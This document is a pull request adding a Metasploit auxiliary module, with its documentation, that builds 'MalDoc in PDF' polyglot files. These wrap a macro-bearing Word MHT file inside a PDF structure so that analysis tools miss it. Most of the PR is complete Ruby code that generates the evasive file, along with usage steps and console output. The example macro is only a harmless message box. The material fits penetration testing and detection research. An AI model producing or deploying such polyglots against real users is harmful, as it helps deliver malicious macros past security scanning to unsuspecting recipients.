### PR TITLE
Add Maldoc in PDF polyglot fileformat module

### DIFF
--- a/documentation/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.md
+++ b/documentation/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.md
@@ -1,0 +1,101 @@
+## Vulnerable Application
+
+The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files,
+which is why malicious code contained in them cannot be detected by many analysis tools.
+
+The document can be opened in both Microsoft Word and a PDF reader.
+
+However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass
+configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers
+or similar software.
+
+### Introduction
+
+A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+structure of PDF.
+
+If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+## For Testing
+
+You create a `Single File Web Page (*.mht, *.mhtml)` file containing a VBS macro. For testing, you can use the
+following macro:
+
+```
+Sub AutoOpen()
+   MsgBox "Macro executed successfully!", vbInformation, "Information"
+End Sub
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `auxiliary/fileformat/maldoc_in_pdf_polyglot`
+3. Do: `set FILENAME /tmp/macro.htm`
+4. Do: `run`
+
+## Options
+
+### FILENAME
+
+The input MHT filename with macro embedded.
+
+### INJECTED_PDF
+
+The input PDF filename to be injected. (optional)
+
+### MESSAGE_PDF
+
+The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word
+
+## Scenarios
+
+### Create without PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF                                                 no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using local template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+### Create using PDF template
+
+```
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > options 
+
+Module options (auxiliary/fileformat/maldoc_in_pdf_polyglot):
+
+   Name          Current Setting                                Required  Description
+   ----          ---------------                                --------  -----------
+   FILENAME      /tmp/macro.mht                                 yes       The input MHT filename with macro embedded
+   INJECTED_PDF  /tmp/injected.pdf                              no        The input PDF filename to be injected (optional)
+   MESSAGE_PDF   You must open this document in Microsoft Word  no        The message to display in the local PDF template (if INJECTED_PDF is NOT used)
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(fileformat/maldoc_in_pdf_polyglot) > run
+[*] PDF creation using 'injected.pdf' as template
+[+] The file 'macro.doc' is stored at '/home/mekhalleh/.msf4/local/macro.doc'
+[*] Auxiliary module execution completed
+```
+
+## References
+
+1. <https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html>
+2. <https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/>
+3. <https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/>
+4. <https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo>

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
-          'SideEffects' => []
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -197,7 +197,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     content = File.read(datastore['FILENAME'])
-    if content.nil? || content.empty?
+    if content&.empty?
       fail_with(Failure::BadConfig, 'The MHT file content is empty')
     end
 

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'RAMELLA "mekhalleh" Sebastien from XA Reunion (https://www.exa.re/)' # module author
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
         ],
         'Platform' => ['win'],
         'References' => [

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # saving the file
     ltype = "auxiliary.fileformat.#{shortname}"
-    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), datastore['OUTPUT_EXT'])
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
     path = store_local(ltype, nil, pdf, fname)
 
     print_good("The file '#{fname}' is stored at '#{path}'")
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # saving the file
     ltype = "auxiliary.fileformat.#{shortname}"
-    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), datastore['OUTPUT_EXT'])
+    fname = File.basename(datastore['FILENAME'], '*') + datastore['OUTPUT_EXT']
     path = store_local(ltype, nil, pdf, fname)
 
     print_good("The file '#{fname}' is stored at '#{path}'")
@@ -198,16 +198,13 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     content = File.read(datastore['FILENAME'])
-    if content&.empty?
-      fail_with(Failure::BadConfig, 'The MHT file content is empty')
-    end
+    fail_with(Failure::BadConfig, 'The MHT file content is empty') if content&.empty?
 
     # if no pdf injected is provided, create new PDF from template
-    if datastore['INJECTED_PDF'].nil? || datastore['INJECTED_PDF'].empty?
+    if datastore['INJECTED_PDF'].blank?
       print_status('INJECTED_PDF not provided, creating the PDF from scratch')
-      if datastore['MESSAGE_PDF'].nil? || datastore['MESSAGE_PDF'].empty?
-        fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided')
-      end
+      fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided') if datastore['MESSAGE_PDF'].blank?
+
       create_pdf(content)
     else
       print_status("PDF creation using '#{File.basename(datastore['INJECTED_PDF'])}' as template")

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -1,0 +1,232 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Maldoc in PDF Polyglot converter',
+        'Description' => %q{
+          A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
+          structure of PDF.
+
+          If the file has configured macro, by opening it in Microsoft Word, VBS runs and performs malicious behaviors.
+
+          The attack does not bypass configured macro locks. And the malicious macros are also not executed when the
+          file is opened in PDF readers or similar software.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+        ],
+        'Platform' => ['win'],
+        'References' => [
+          ['URL', 'https://blogs.jpcert.or.jp/en/2023/08/maldocinpdf.html'],
+          ['URL', 'https://socradar.io/maldoc-in-pdf-a-novel-method-to-distribute-malicious-macros/'],
+          ['URL', 'https://www.nospamproxy.de/en/maldoc-in-pdf-danger-from-word-files-hidden-in-pdfs/'],
+          ['URL', 'https://github.com/exa-offsec/maldoc_in_pdf_polyglot/tree/main/demo']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPath.new('FILENAME', [true, 'The input MHT filename with macro embedded']),
+        OptPath.new('INJECTED_PDF', [false, 'The input PDF filename to be injected (optional)']),
+        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word'])
+      ]
+    )
+  end
+
+  def create_pdf(mht)
+    pdf = ''
+    pdf << "#{rand_pdfheader}\r\n"
+
+    # item 1 (catalog)
+    pdf << "1 0 obj\r\n"
+    pdf << "<< /Type /Catalog /Pages 2 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 2 (pages)
+    pdf << "2 0 obj\r\n"
+    pdf << "<< /Type /Pages /Kids [3 0 R] /Count 1 >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 3 (page with resources)
+    pdf << "3 0 obj\r\n"
+    pdf << "<< /Type /Page /Parent 2 0 R /Resources << /Font << /F1 5 0 R >> >> /MediaBox [0 0 612 792] /Contents 4 0 R >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 4 (content)
+    content = "BT /F1 12 Tf 100 700 Td (#{datastore['MESSAGE_PDF']}) Tj ET\r\n"
+    pdf << "4 0 obj\r\n"
+    # exact stream length
+    pdf << "<< /Length #{content.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << content
+    pdf << "endstream\r\n"
+    pdf << "endobj\r\n"
+
+    # item 5 (helvetica font)
+    pdf << "5 0 obj\r\n"
+    pdf << "<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>\r\n"
+    pdf << "endobj\r\n"
+
+    # item 6 (MHT content)
+    pdf << "6 0 obj\r\n"
+    pdf << "<< /Length #{mht.length} >>\r\n"
+    pdf << "stream\r\n"
+    pdf << mht
+    pdf << "\r\nendstream\r\n"
+    pdf << "endobj\r\n"
+
+    # calculation of dynamic offsets
+    offsets = []
+    offsets << 0
+    offsets << pdf.index('1 0 obj')
+    offsets << pdf.index('2 0 obj')
+    offsets << pdf.index('3 0 obj')
+    offsets << pdf.index('4 0 obj')
+    offsets << pdf.index('5 0 obj')
+    offsets << pdf.index('6 0 obj')
+
+    # XREF section
+    xref_start = pdf.length
+    pdf << "xref\r\n"
+    # update for 7 objects (0-6)
+    pdf << "0 7\r\n"
+    pdf << "0000000000 65535 f\r\n"
+    offsets[1..].each do |offset|
+      pdf << format("%010d 00000 n\r\n", offset)
+    end
+
+    # trailer
+    pdf << "trailer\r\n"
+    # update for 7 objects (0-6)
+    pdf << "<< /Size 7 /Root 1 0 R >>\r\n"
+    pdf << "startxref\r\n"
+    pdf << "#{xref_start}\r\n"
+    pdf << "%%EOF\r\n"
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def inject_pdf(pdf_path, mht)
+    # read PDF in binary mode
+    pdf_data = File.binread(pdf_path)
+    vprint_status("PDF data length: #{pdf_data.length}")
+
+    # find the position of 'startxref'
+    startxref_index = pdf_data.rindex('startxref')
+    unless startxref_index
+      fail_with(Failure::Unknown, 'Invalid PDF: \'startxref\' not found')
+    end
+
+    xref_start_value = pdf_data[startxref_index..].match(/startxref\r?\n(\d+)/)[1].to_i
+    vprint_status("PDF startxref value: #{xref_start_value}")
+    vprint_status("PDF startxref position: #{startxref_index}")
+
+    # extract the original objects
+    original_objects = pdf_data[0...startxref_index]
+
+    # build the MHT object as the first object (0 0 obj)
+    mht_object = ''
+    mht_object << "0 0 obj\r\n"
+    mht_object << "<< /Length #{mht.length} >>\r\n"
+    mht_object << "stream\r\n"
+    mht_object << mht
+    mht_object << "\r\nendstream\r\n"
+    mht_object << "endobj\r\n"
+
+    # combine: MHT first, then original items
+    updated_objects = mht_object + original_objects
+
+    # calculate offsets for XREF section
+    offsets = []
+    updated_objects.scan(/(\d+) 0 obj/) do |match|
+      offsets << updated_objects.index("#{match[0]} 0 obj")
+    end
+
+    # build the XREF section
+    xref = "xref\r\n"
+    # includes free entry (0) and items
+    xref << "0 #{offsets.size + 1}\r\n"
+    # free entry
+    xref << "0000000000 65535 f\r\n"
+    offsets.each do |offset|
+      xref << format("%010d 00000 n\r\n", offset)
+    end
+
+    # build the trailer
+    xref_start_new = updated_objects.length
+    trailer = "trailer\r\n"
+    trailer << "<< /Size #{offsets.size + 1} /Root 1 0 R >>\r\n"
+    trailer << "startxref\r\n"
+    trailer << "#{xref_start_new}\r\n"
+    trailer << "%%EOF\r\n"
+
+    # assemble the final PDF
+    headers = "#{rand_pdfheader}\r\n"
+    pdf = headers + updated_objects + xref + trailer
+
+    # saving the file
+    ltype = "auxiliary.fileformat.#{shortname}"
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    path = store_local(ltype, nil, pdf, fname)
+
+    print_good("The file '#{fname}' is stored at '#{path}'")
+  end
+
+  def rand_pdfheader
+    # List of recognized PDF versions
+    pdf_versions = [
+      '1.0', '1.1', '1.2', '1.3', '1.4', '1.5', '1.6', '1.7', '2.0'
+    ]
+    # random verion selection
+    selected_version = pdf_versions.sample
+
+    "%PDF-#{selected_version}"
+  end
+
+  def run
+    if datastore['FILENAME'].nil? || datastore['FILENAME'].empty?
+      fail_with(Failure::BadConfig, 'No FILENAME provided')
+    end
+
+    content = File.read(datastore['FILENAME'])
+    if content.nil? || content.empty?
+      fail_with(Failure::BadConfig, 'The MHT file content is empty')
+    end
+
+    # if no pdf injected is provided, create new PDF from template
+    if datastore['INJECTED_PDF'].nil? || datastore['INJECTED_PDF'].empty?
+      print_status('PDF creation using local template')
+      if datastore['MESSAGE_PDF'].nil? || datastore['MESSAGE_PDF'].empty?
+        fail_with(Failure::BadConfig, 'No MESSAGE_PDF provided')
+      end
+      create_pdf(content)
+
+    # else if injected pdf is provided
+    else
+      print_status("PDF creation using '#{File.basename(datastore['INJECTED_PDF'])}' as template")
+
+      inject_pdf(datastore['INJECTED_PDF'], content)
+    end
+  end
+
+end

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -43,7 +43,8 @@ class MetasploitModule < Msf::Auxiliary
       [
         OptPath.new('FILENAME', [true, 'The input MHT filename with macro embedded']),
         OptPath.new('INJECTED_PDF', [false, 'The input PDF filename to inject in (optional)']),
-        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word'])
+        OptString.new('MESSAGE_PDF', [false, 'The message to display in the local PDF template (if INJECTED_PDF is NOT used)', 'You must open this document in Microsoft Word']),
+        OptEnum.new('OUTPUT_EXT', [true, 'The output file extension', '.doc', ['.doc', '.rtf']])
       ]
     )
   end
@@ -117,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # saving the file
     ltype = "auxiliary.fileformat.#{shortname}"
-    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), datastore['OUTPUT_EXT'])
     path = store_local(ltype, nil, pdf, fname)
 
     print_good("The file '#{fname}' is stored at '#{path}'")
@@ -183,7 +184,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # saving the file
     ltype = "auxiliary.fileformat.#{shortname}"
-    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), '.doc')
+    fname = File.basename(datastore['FILENAME']).sub(File.extname(datastore['FILENAME']), datastore['OUTPUT_EXT'])
     path = store_local(ltype, nil, pdf, fname)
 
     print_good("The file '#{fname}' is stored at '#{path}'")

--- a/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
+++ b/modules/auxiliary/fileformat/maldoc_in_pdf_polyglot.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'mekhalleh (RAMELLA Sebastien)' # module author powered by EXA Reunion (https://www.exa.re/)
+          'RAMELLA "mekhalleh" Sebastien from XA Reunion (https://www.exa.re/)' # module author
         ],
         'Platform' => ['win'],
         'References' => [


### PR DESCRIPTION
The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files, which is why malicious code contained in them cannot be detected by many analysis tools.

**The document can be opened in both Microsoft Word and a PDF reader.**

However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers or similar software.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/fileformat/maldoc_in_pdf_polyglot`
- [ ] `set FILENAME /tmp/macro.htm`
- [ ] `run`

## Options

### FILENAME

The input MHT filename with macro embedded.

### INJECTED_PDF

The input PDF filename to be injected. (optional)

### MESSAGE_PDF

The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word

## Results

The document can be opened in both Microsoft Word and a PDF reader.

![image](https://github.com/user-attachments/assets/f3afbf7a-b50a-4876-b586-2ce50caa1241)

A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
structure of PDF.

![image](https://github.com/user-attachments/assets/b4aef43b-c7d8-408a-b441-a57680d384fe)
